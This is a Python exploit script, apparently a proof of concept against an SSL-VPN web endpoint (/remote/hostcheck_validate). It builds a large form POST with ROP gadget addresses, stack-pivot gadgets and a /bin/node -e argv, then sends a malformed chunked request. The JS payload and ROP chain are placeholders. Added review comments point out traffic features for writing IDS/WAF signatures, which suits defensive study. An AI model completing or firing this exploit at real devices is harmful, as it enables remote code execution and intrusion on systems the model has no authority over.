"""DISCLAIMER: For authorized security research only. Use only on systems you own or are explicitly authorized to test."""
import socket
import time

# Placeholder target. Everything below is plaintext HTTP/1.1 over a raw TCP
# socket: no TLS is negotiated anywhere in this script, despite the "ssock"
# variable names used for the connections.
TARGET_HOST = "x.x.x.x"
PORT = 80


# Function to create a socket
def make_sock(target: str, port: int) -> socket.socket:
    """Open an IPv4 TCP connection to ``(target, port)`` and return the socket.

    No timeout is configured, so ``connect()`` can block indefinitely on an
    unresponsive host.  The caller owns the returned socket; nothing in this
    script ever closes the sockets it creates.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target, port))
    return sock


# Craft the payload
# NOTE(review): on the wire each of these is a percent-encoded ASCII string
# (24 bytes for the 8-byte values, 12 for `rop`), not raw binary.  The request
# body is therefore printable form data dominated by long runs of "B" filler,
# which matters when writing content signatures for it.
ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
getcwd_ptr = b"%70%62%2c%04%00%00%00%00"
pivot_1 = b"%52%f7%fd%00%00%00%00%00"  # push rdi; pop rsp; ret;
pivot_2 = b"%ac%c9%ab%02%00%00%00%00"  # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;
rop = b"%de%ad%be%ef"  # Example ROP chain

# Craft the form value
# A single form value: argv-style NUL-terminated strings ("/bin/node", "-e")
# and the literal markers "JS_PAYLOAD" / "CALL_EXECL" interleaved with "B"
# filler at fixed offsets.  As written, JS_PAYLOAD and CALL_EXECL are
# placeholder text, not functional values.
form_value = b""
form_value += b"B" * 11 + b"/bin/node\0" + b"B" * 6 + b"-e\0" + b"B" * 14 + b"JS_PAYLOAD"
form_value += b"B" * 438 + pivot_2 + getcwd_ptr
form_value += b"B" * 32 + pivot_1
form_value += b"B" * 168 + b"CALL_EXECL"
form_value += b"B" * 432 + ssl_do_handshake_ptr
form_value += b"B" * 32 + rop

# Craft the HTTP body
# Twenty repetitions of <1808-byte key>=<form_value>&.  By the constants above
# the body is on the order of 60 KB; a form POST of this size and shape to the
# path below is anomalous and straightforward to alert on.
body = (b"B" * 1808 + b"=" + form_value + b"&") * 20

# Craft the HTTP request
# First request: POST /remote/hostcheck_validate with an explicit
# Content-Length.  Only Host and Content-Length headers are sent (no
# Content-Type, no User-Agent), which is itself a distinguishing feature of
# this traffic.
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: " + TARGET_HOST.encode("utf-8") + b"\r\n"
data += f"Content-Length: {len(body)}\r\n".encode("utf-8")
data += b"\r\n"
data += body

# Send the crafted request
# The response is never read and the socket is never closed.
ssock1 = make_sock(TARGET_HOST, PORT)
ssock1.sendall(data)
# Fixed pause before opening the second connection; presumably to let the
# server process the first request -- the script does not say.
time.sleep(1)

# Second request on a fresh connection: POST / with Transfer-Encoding: chunked
# and no Content-Length.  The chunk-size line is 4137 ASCII "0" characters
# followed by a NUL byte, then a lone "A" and a blank line.  RFC 9112 only
# permits hexadecimal digits (plus optional chunk extensions) on that line, so
# this is malformed HTTP; a chunk-size line of that length containing a NUL is
# an easy IDS/WAF signature.  Again the response is not read and the socket is
# left open.
ssock2 = make_sock(TARGET_HOST, PORT)
data = b"POST / HTTP/1.1\r\n"
data += b"Host: " + TARGET_HOST.encode("utf-8") + b"\r\n"
data += b"Transfer-Encoding: chunked\r\n"
data += b"\r\n"
data += b"0" * 4137 + b"\0"
data += b"A" * 1 + b"\r\n\r\n"
ssock2.sendall(data)